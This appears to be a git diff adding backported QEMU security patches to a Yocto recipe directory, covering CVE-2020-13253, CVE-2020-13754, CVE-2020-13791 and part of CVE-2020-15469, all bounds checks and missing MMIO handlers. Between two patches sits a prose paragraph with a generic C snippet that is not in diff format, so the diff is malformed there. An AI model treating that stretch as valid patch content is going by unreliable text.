diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
new file mode 100644
index 0000000000..ffce610f79
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13253_5.patch
@@ -0,0 +1,54 @@
+From 9157dd597d293ab7f599f4d96c3fe8a6e07c633d Mon Sep 17 00:00:00 2001
+From: =?utf8?q?Philippe=20Mathieu-Daud=C3=A9?= <f4bug@amsat.org>
+Date: Wed, 3 Jun 2020 19:59:16 +0200
+Subject: [PATCH] hw/sd/sdcard: Restrict Class 6 commands to SCSD cards
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+Only SCSD cards support Class 6 (Block Oriented Write Protection)
+commands.
+
+ "SD Specifications Part 1 Physical Layer Simplified Spec. v3.01"
+
+ 4.3.14 Command Functional Difference in Card Capacity Types
+
+ * Write Protected Group
+
+ SDHC and SDXC do not support write-protected groups. Issuing
+ CMD28, CMD29 and CMD30 generates the ILLEGAL_COMMAND error.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Philippe Mathieu-Daudé <f4bug@amsat.org>
+Reviewed-by: Alistair Francis <alistair.francis@wdc.com>
+Message-Id: <20200630133912.9428-7-f4bug@amsat.org>
+
+Upstream-Status: Backport:
+https://git.qemu.org/?p=qemu.git;a=commit;h=9157dd597d293ab7f599f4d96c3fe8a6e07c633d
+
+CVE: CVE-2020-13253
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/sd/sd.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/hw/sd/sd.c b/hw/sd/sd.c
+index 5137168..1cc16bf 100644
+--- a/hw/sd/sd.c
++++ b/hw/sd/sd.c
+@@ -920,6 +920,11 @@ static sd_rsp_type_t sd_normal_command(SDState *sd, SDRequest req)
+ sd->multi_blk_cnt = 0;
+ }
+
++ if (sd_cmd_class[req.cmd] == 6 && FIELD_EX32(sd->ocr, OCR, CARD_CAPACITY)) {
++ /* Only Standard Capacity cards support class 6 commands */
++ return sd_illegal;
++ }
++
+ switch (req.cmd) {
+ /* Basic commands (Class 0 and Class 1) */
+ case 0: /* CMD0: GO_IDLE_STATE */
+--
+1.8.3.1
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
new file mode 100644
index 0000000000..fdfff9d81d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-1.patch
@@ -0,0 +1,91 @@
+From 5d971f9e672507210e77d020d89e0e89165c8fc9 Mon Sep 17 00:00:00 2001
+From: "Michael S. Tsirkin" <mst@redhat.com>
+Date: Wed, 10 Jun 2020 09:47:49 -0400
+Subject: [PATCH] memory: Revert "memory: accept mismatching sizes in
+ memory_region_access_valid"
+
+Memory API documentation documents valid .min_access_size and .max_access_size
+fields and explains that any access outside these boundaries is blocked.
+
+This is what devices seem to assume.
+
+However this is not what the implementation does: it simply
+ignores the boundaries unless there's an "accepts" callback.
+
+Naturally, this breaks a bunch of devices.
+
+Revert to the documented behaviour.
+
+Devices that want to allow any access can just drop the valid field,
+or add the impl field to have accesses converted to appropriate
+length.
+
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Richard Henderson <rth@twiddle.net>
+Fixes: CVE-2020-13754
+Fixes: https://bugzilla.redhat.com/show_bug.cgi?id=1842363
+Fixes: a014ed07bd5a ("memory: accept mismatching sizes in memory_region_access_valid")
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+Message-Id: <20200610134731.1514409-1-mst@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=5d971f9e672507210e77d020d89e0e89165c8fc9
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ memory.c | 29 +++++++++--------------------
+ 1 file changed, 9 insertions(+), 20 deletions(-)
+
+diff --git a/memory.c b/memory.c
+index 2f15a4b..9200b20 100644
+--- a/memory.c
++++ b/memory.c
+@@ -1352,35 +1352,24 @@ bool memory_region_access_valid(MemoryRegion *mr,
+ bool is_write,
+ MemTxAttrs attrs)
+ {
+- int access_size_min, access_size_max;
+- int access_size, i;
+-
+- if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++ if (mr->ops->valid.accepts
++ && !mr->ops->valid.accepts(mr->opaque, addr, size, is_write, attrs)) {
+ return false;
+ }
+
+- if (!mr->ops->valid.accepts) {
+- return true;
+- }
+-
+- access_size_min = mr->ops->valid.min_access_size;
+- if (!mr->ops->valid.min_access_size) {
+- access_size_min = 1;
++ if (!mr->ops->valid.unaligned && (addr & (size - 1))) {
++ return false;
+ }
+
+- access_size_max = mr->ops->valid.max_access_size;
++ /* Treat zero as compatibility all valid */
+ if (!mr->ops->valid.max_access_size) {
+- access_size_max = 4;
++ return true;
+ }
+
+- access_size = MAX(MIN(size, access_size_max), access_size_min);
+- for (i = 0; i < size; i += access_size) {
+- if (!mr->ops->valid.accepts(mr->opaque, addr + i, access_size,
+- is_write, attrs)) {
+- return false;
+- }
++ if (size > mr->ops->valid.max_access_size
++ || size < mr->ops->valid.min_access_size) {
++ return false;
+ }
+-
+ return true;
+ }
+
+--
+1.8.3.1
+
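The revert restores the documented rule: an access is valid only when it is suitably aligned and its size lies within the region's declared min/max access sizes. A generic, stand-alone restatement of that rule, with field and function names that are assumptions rather than the QEMU memory API:

    #include <stdbool.h>
    #include <stdint.h>

    struct mmio_valid {
        unsigned min_access_size;   /* 0: no lower bound declared */
        unsigned max_access_size;   /* 0: accept any size */
        bool unaligned;             /* allow unaligned accesses */
    };

    static bool mmio_access_valid(const struct mmio_valid *v,
                                  uint64_t addr, unsigned size)
    {
        if (!v->unaligned && (addr & (size - 1))) {
            return false;           /* misaligned and not allowed */
        }
        if (v->max_access_size == 0) {
            return true;            /* compatibility: zero means "all valid" */
        }
        return size >= v->min_access_size && size <= v->max_access_size;
    }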
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
new file mode 100644
index 0000000000..7354edc54d
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-2.patch
@@ -0,0 +1,69 @@
+From dba04c3488c4699f5afe96f66e448b1d447cf3fb Mon Sep 17 00:00:00 2001
+From: Michael Tokarev <mjt@tls.msk.ru>
+Date: Mon, 20 Jul 2020 19:06:27 +0300
+Subject: [PATCH] acpi: accept byte and word access to core ACPI registers
+
+All ISA registers should be accessible as bytes, words or dwords
+(if wide enough). Fix the access constraints for acpi-pm-evt,
+acpi-pm-tmr & acpi-cnt registers.
+
+Fixes: 5d971f9e67 (memory: Revert "memory: accept mismatching sizes in memory_region_access_valid")
+Fixes: afafe4bbe0 (apci: switch cnt to memory api)
+Fixes: 77d58b1e47 (apci: switch timer to memory api)
+Fixes: b5a7c024d2 (apci: switch evt to memory api)
+Buglink: https://lore.kernel.org/xen-devel/20200630170913.123646-1-anthony.perard@citrix.com/T/
+Buglink: https://bugs.debian.org/964793
+BugLink: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964247
+BugLink: https://bugs.launchpad.net/bugs/1886318
+Reported-By: Simon John <git@the-jedi.co.uk>
+Signed-off-by: Michael Tokarev <mjt@tls.msk.ru>
+Message-Id: <20200720160627.15491-1-mjt@msgid.tls.msk.ru>
+Cc: qemu-stable@nongnu.org
+Reviewed-by: Michael S. Tsirkin <mst@redhat.com>
+Signed-off-by: Michael S. Tsirkin <mst@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=dba04c3488c4699f5afe96f66e448b1d447cf3fb
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/acpi/core.c | 9 ++++++---
+ 1 file changed, 6 insertions(+), 3 deletions(-)
+
+diff --git a/hw/acpi/core.c b/hw/acpi/core.c
+index f6d9ec4..ac06db3 100644
+--- a/hw/acpi/core.c
++++ b/hw/acpi/core.c
+@@ -458,7 +458,8 @@ static void acpi_pm_evt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_evt_ops = {
+ .read = acpi_pm_evt_read,
+ .write = acpi_pm_evt_write,
+- .valid.min_access_size = 2,
++ .impl.min_access_size = 2,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 2,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -527,7 +528,8 @@ static void acpi_pm_tmr_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_tmr_ops = {
+ .read = acpi_pm_tmr_read,
+ .write = acpi_pm_tmr_write,
+- .valid.min_access_size = 4,
++ .impl.min_access_size = 4,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 4,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+@@ -599,7 +601,8 @@ static void acpi_pm_cnt_write(void *opaque, hwaddr addr, uint64_t val,
+ static const MemoryRegionOps acpi_pm_cnt_ops = {
+ .read = acpi_pm_cnt_read,
+ .write = acpi_pm_cnt_write,
+- .valid.min_access_size = 2,
++ .impl.min_access_size = 2,
++ .valid.min_access_size = 1,
+ .valid.max_access_size = 2,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
new file mode 100644
index 0000000000..2a8781050f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-3.patch
@@ -0,0 +1,65 @@
+From 8e67fda2dd6202ccec093fda561107ba14830a17 Mon Sep 17 00:00:00 2001
+From: Laurent Vivier <lvivier@redhat.com>
+Date: Tue, 21 Jul 2020 10:33:22 +0200
+Subject: [PATCH] xhci: fix valid.max_access_size to access address registers
+MIME-Version: 1.0
+Content-Type: text/plain; charset=utf8
+Content-Transfer-Encoding: 8bit
+
+QEMU XHCI advertises AC64 (64-bit addressing) but doesn't allow
+64-bit mode access in "runtime" and "operational" MemoryRegionOps.
+
+Set the max_access_size based on sizeof(dma_addr_t) as AC64 is set.
+
+XHCI specs:
+"If the xHC supports 64-bit addressing (AC64 = â1â), then software
+should write 64-bit registers using only Qword accesses. If a
+system is incapable of issuing Qword accesses, then writes to the
+64-bit address fields shall be performed using 2 Dword accesses;
+low Dword-first, high-Dword second. If the xHC supports 32-bit
+addressing (AC64 = '0'), then the high Dword of registers containing
+64-bit address fields are unused and software should write addresses
+using only Dword accesses"
+
+The problem has been detected with SLOF, as linux kernel always accesses
+registers using 32-bit access even if AC64 is set and revealed by
+5d971f9e6725 ("memory: Revert "memory: accept mismatching sizes in memory_region_access_valid"")
+
+Suggested-by: Alexey Kardashevskiy <aik@au1.ibm.com>
+Signed-off-by: Laurent Vivier <lvivier@redhat.com>
+Message-id: 20200721083322.90651-1-lvivier@redhat.com
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=8e67fda2dd6202ccec093fda561107ba14830a17
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/usb/hcd-xhci.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
+index b330e36..67a18fe 100644
+--- a/hw/usb/hcd-xhci.c
++++ b/hw/usb/hcd-xhci.c
+@@ -3184,7 +3184,7 @@ static const MemoryRegionOps xhci_oper_ops = {
+ .read = xhci_oper_read,
+ .write = xhci_oper_write,
+ .valid.min_access_size = 4,
+- .valid.max_access_size = 4,
++ .valid.max_access_size = sizeof(dma_addr_t),
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
+@@ -3200,7 +3200,7 @@ static const MemoryRegionOps xhci_runtime_ops = {
+ .read = xhci_runtime_read,
+ .write = xhci_runtime_write,
+ .valid.min_access_size = 4,
+- .valid.max_access_size = 4,
++ .valid.max_access_size = sizeof(dma_addr_t),
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
new file mode 100644
index 0000000000..6bad07d03f
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13754-4.patch
@@ -0,0 +1,39 @@
+From 70b78d4e71494c90d2ccb40381336bc9b9a22f79 Mon Sep 17 00:00:00 2001
+From: Alistair Francis <alistair.francis@wdc.com>
+Date: Tue, 30 Jun 2020 13:12:11 -0700
+Subject: [PATCH] hw/riscv: Allow 64 bit access to SiFive CLINT
+
+Commit 5d971f9e672507210e77d020d89e0e89165c8fc9
+"memory: Revert "memory: accept mismatching sizes in
+memory_region_access_valid"" broke most RISC-V boards as they do 64 bit
+accesses to the CLINT and QEMU would trigger a fault. Fix this failure
+by allowing 8 byte accesses.
+
+Signed-off-by: Alistair Francis <alistair.francis@wdc.com>
+Reviewed-by: LIU Zhiwei<zhiwei_liu@c-sky.com>
+Message-Id: <122b78825b077e4dfd39b444d3a46fe894a7804c.1593547870.git.alistair.francis@wdc.com>
+
+https://git.qemu.org/?p=qemu.git;a=patch;h=70b78d4e71494c90d2ccb40381336bc9b9a22f79
+CVE: CVE-2020-13754
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/riscv/sifive_clint.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/hw/riscv/sifive_clint.c b/hw/riscv/sifive_clint.c
+index b11ffa0..669c21a 100644
+--- a/hw/riscv/sifive_clint.c
++++ b/hw/riscv/sifive_clint.c
+@@ -181,7 +181,7 @@ static const MemoryRegionOps sifive_clint_ops = {
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ .valid = {
+ .min_access_size = 4,
+- .max_access_size = 4
++ .max_access_size = 8
+ }
+ };
+
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
new file mode 100644
index 0000000000..1e8278f7b7
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-13791.patch
@@ -0,0 +1,44 @@
+Date: Thu, 4 Jun 2020 16:25:24 +0530
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Subject: [PATCH v3] ati-vga: check address before reading configuration bytes (CVE-2020-13791)
+
+While reading PCI configuration bytes, a guest may send an
+address towards the end of the configuration space. It may lead
+to an OOB access issue. Add check to ensure 'address + size' is
+within PCI configuration space.
+
+CVE: CVE-2020-13791
+
+Upstream-Status: Submitted
+https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00979.html
+
+Reported-by: Ren Ding <rding@gatech.edu>
+Reported-by: Hanqing Zhao <hanqing@gatech.edu>
+Reported-by: Yi Ren <c4tren@gmail.com>
+Suggested-by: BALATON Zoltan <balaton@eik.bme.hu>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+ hw/display/ati.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+Update v3: avoid modifying 'addr' variable
+ -> https://lists.gnu.org/archive/html/qemu-devel/2020-06/msg00834.html
+
+diff --git a/hw/display/ati.c b/hw/display/ati.c
+index 67604e68de..b4d0fd88b7 100644
+--- a/hw/display/ati.c
++++ b/hw/display/ati.c
+@@ -387,7 +387,9 @@ static uint64_t ati_mm_read(void *opaque, hwaddr addr, unsigned int size)
+ val = s->regs.crtc_pitch;
+ break;
+ case 0xf00 ... 0xfff:
+- val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++ if ((addr - 0xf00) + size <= pci_config_size(&s->dev)) {
++ val = pci_default_read_config(&s->dev, addr - 0xf00, size);
++ }
+ break;
+ case CUR_OFFSET:
+ val = s->regs.cur_offset;
+--
+2.26.2
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
new file mode 100644
index 0000000000..20f39f0a26
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-1.patch
@@ -0,0 +1,50 @@
+From 520f26fc6d17b71a43eaf620e834b3bdf316f3d3 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:25 +0530
+Subject: [PATCH] hw/pci-host: add pci-intack write method
+
+Add pci-intack mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-2-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu
+https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-1.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/qemu/qemu/commit/520f26fc6d17b71a43eaf620e834b3bdf316f3d3 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/prep.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/pci-host/prep.c
++++ b/hw/pci-host/prep.c
+@@ -26,6 +26,7 @@
+ #include "qemu/osdep.h"
+ #include "qemu-common.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qapi/error.h"
+ #include "hw/pci/pci.h"
+ #include "hw/pci/pci_bus.h"
+@@ -119,8 +120,15 @@ static uint64_t raven_intack_read(void *
+ return pic_read_irq(isa_pic);
+ }
+
++static void raven_intack_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++}
++
+ static const MemoryRegionOps raven_intack_ops = {
+ .read = raven_intack_read,
++ .write = raven_intack_write,
+ .valid = {
+ .max_access_size = 1,
+ },
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
new file mode 100644
index 0000000000..d6715d337c
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-2.patch
@@ -0,0 +1,69 @@
+From 4f2a5202a05fc1612954804a2482f07bff105ea2 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:26 +0530
+Subject: [PATCH] pci-host: designware: add pcie-msi read method
+
+Add pcie-msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-3-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-2.patch?h=ubuntu/focal-security Upstream Commit https://github.com/qemu/qemu/commit/4f2a5202a05fc1612954804a2482f07bff105ea2]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/pci-host/designware.c | 19 +++++++++++++++++++
+ 1 file changed, 19 insertions(+)
+
+diff --git a/hw/pci-host/designware.c b/hw/pci-host/designware.c
+index f9fb97a..bde3a34 100644
+--- a/hw/pci-host/designware.c
++++ b/hw/pci-host/designware.c
+@@ -21,6 +21,7 @@
+ #include "qemu/osdep.h"
+ #include "qapi/error.h"
+ #include "qemu/module.h"
++#include "qemu/log.h"
+ #include "hw/pci/msi.h"
+ #include "hw/pci/pci_bridge.h"
+ #include "hw/pci/pci_host.h"
+@@ -63,6 +64,23 @@ designware_pcie_root_to_host(DesignwarePCIERoot *root)
+ return DESIGNWARE_PCIE_HOST(bus->parent);
+ }
+
++static uint64_t designware_pcie_root_msi_read(void *opaque, hwaddr addr,
++ unsigned size)
++{
++ /*
++ * Attempts to read from the MSI address are undefined in
++ * the PCI specifications. For this hardware, the datasheet
++ * specifies that a read from the magic address is simply not
++ * intercepted by the MSI controller, and will go out to the
++ * AHB/AXI bus like any other PCI-device-initiated DMA read.
++ * This is not trivial to implement in QEMU, so since
++ * well-behaved guests won't ever ask a PCI device to DMA from
++ * this address we just log the missing functionality.
++ */
++ qemu_log_mask(LOG_UNIMP, "%s not implemented\n", __func__);
++ return 0;
++}
++
+ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+ uint64_t val, unsigned len)
+ {
+@@ -77,6 +95,7 @@ static void designware_pcie_root_msi_write(void *opaque, hwaddr addr,
+ }
+
+ static const MemoryRegionOps designware_pci_host_msi_ops = {
++ .read = designware_pcie_root_msi_read,
+ .write = designware_pcie_root_msi_write,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ .valid = {
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
new file mode 100644
index 0000000000..85abe8ff32
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-3.patch
@@ -0,0 +1,49 @@
+From 24202d2b561c3b4c48bd28383c8c34b4ac66c2bf Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:27 +0530
+Subject: [PATCH] vfio: add quirk device write method
+
+Add vfio quirk device mmio write method to avoid NULL pointer
+dereference issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Acked-by: Alex Williamson <alex.williamson@redhat.com>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Message-Id: <20200811114133.672647-4-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-3.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/24202d2b561c3b4c48bd28383c8c34b4ac66c2bf]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/vfio/pci-quirks.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+--- a/hw/vfio/pci-quirks.c
++++ b/hw/vfio/pci-quirks.c
+@@ -13,6 +13,7 @@
+ #include "qemu/osdep.h"
+ #include "exec/memop.h"
+ #include "qemu/units.h"
++#include "qemu/log.h"
+ #include "qemu/error-report.h"
+ #include "qemu/main-loop.h"
+ #include "qemu/module.h"
+@@ -278,8 +279,15 @@ static uint64_t vfio_ati_3c3_quirk_read(
+ return data;
+ }
+
++static void vfio_ati_3c3_quirk_write(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps vfio_ati_3c3_quirk = {
+ .read = vfio_ati_3c3_quirk_read,
++ .write = vfio_ati_3c3_quirk_write,
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
new file mode 100644
index 0000000000..52fac8a051
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-4.patch
@@ -0,0 +1,53 @@
+From f867cebaedbc9c43189f102e4cdfdff05e88df7f Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:28 +0530
+Subject: [PATCH] prep: add ppc-parity write method
+
+Add ppc-parity mmio write method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Acked-by: David Gibson <david@gibson.dropbear.id.au>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-5-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-4.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/f867cebaedbc9c43189f102e4cdfdff05e88df7f]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/ppc/prep_systemio.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/hw/ppc/prep_systemio.c b/hw/ppc/prep_systemio.c
+index 4e48ef2..b2bd783 100644
+--- a/hw/ppc/prep_systemio.c
++++ b/hw/ppc/prep_systemio.c
+@@ -23,6 +23,7 @@
+ */
+
+ #include "qemu/osdep.h"
++#include "qemu/log.h"
+ #include "hw/irq.h"
+ #include "hw/isa/isa.h"
+ #include "hw/qdev-properties.h"
+@@ -235,8 +236,15 @@ static uint64_t ppc_parity_error_readl(void *opaque, hwaddr addr,
+ return val;
+ }
+
++static void ppc_parity_error_writel(void *opaque, hwaddr addr,
++ uint64_t data, unsigned size)
++{
++ qemu_log_mask(LOG_GUEST_ERROR, "%s: invalid access\n", __func__);
++}
++
+ static const MemoryRegionOps ppc_parity_error_ops = {
+ .read = ppc_parity_error_readl,
++ .write = ppc_parity_error_writel,
+ .valid = {
+ .min_access_size = 4,
+ .max_access_size = 4,
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
new file mode 100644
index 0000000000..49c6c5e3e2
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-5.patch
@@ -0,0 +1,53 @@
+From b5bf601f364e1a14ca4c3276f88dfec024acf613 Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:29 +0530
+Subject: [PATCH] nvram: add nrf51_soc flash read method
+
+Add nrf51_soc mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
+Reviewed-by: Peter Maydell <peter.maydell@linaro.org>
+Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
+Reviewed-by: Li Qiang <liq3ea@gmail.com>
+Message-Id: <20200811114133.672647-6-ppandit@redhat.com>
+Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>
+
+CVE: CVE-2020-15469
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/qemu/tree/debian/patches/CVE-2020-15469-5.patch?h=ubuntu/focal-security Upstream commit https://github.com/qemu/qemu/commit/b5bf601f364e1a14ca4c3276f88dfec024acf613 ]
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ hw/nvram/nrf51_nvm.c | 10 ++++++++++
+ 1 file changed, 10 insertions(+)
+
+diff --git a/hw/nvram/nrf51_nvm.c b/hw/nvram/nrf51_nvm.c
+index f2283c1..7b3460d 100644
+--- a/hw/nvram/nrf51_nvm.c
++++ b/hw/nvram/nrf51_nvm.c
+@@ -273,6 +273,15 @@ static const MemoryRegionOps io_ops = {
+ .endianness = DEVICE_LITTLE_ENDIAN,
+ };
+
++static uint64_t flash_read(void *opaque, hwaddr offset, unsigned size)
++{
++ /*
++ * This is a rom_device MemoryRegion which is always in
++ * romd_mode (we never put it in MMIO mode), so reads always
++ * go directly to RAM and never come here.
++ */
++ g_assert_not_reached();
++}
+
+ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+ unsigned int size)
+@@ -300,6 +309,7 @@ static void flash_write(void *opaque, hwaddr offset, uint64_t value,
+
+
+ static const MemoryRegionOps flash_ops = {
++ .read = flash_read,
+ .write = flash_write,
+ .valid.min_access_size = 4,
+ .valid.max_access_size = 4,
+--
+1.8.3.1
+
diff --git a/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
new file mode 100644
index 0000000000..115be68295
--- /dev/null
+++ b/meta/recipes-devtools/qemu/qemu/CVE-2020-15469-6.patch
@@ -0,0 +1,61 @@
+Backport of:
+
+From 921604e175b8ec06c39503310e7b3ec1e3eafe9e Mon Sep 17 00:00:00 2001
+From: Prasad J Pandit <pjp@fedoraproject.org>
+Date: Tue, 11 Aug 2020 17:11:30 +0530
+Subject: [PATCH] spapr_pci: add spapr msi read method
+
+Add spapr msi mmio read method to avoid NULL pointer dereference
+issue.
+
+Reported-by: Lei Sun <slei.casper@gmail.com>
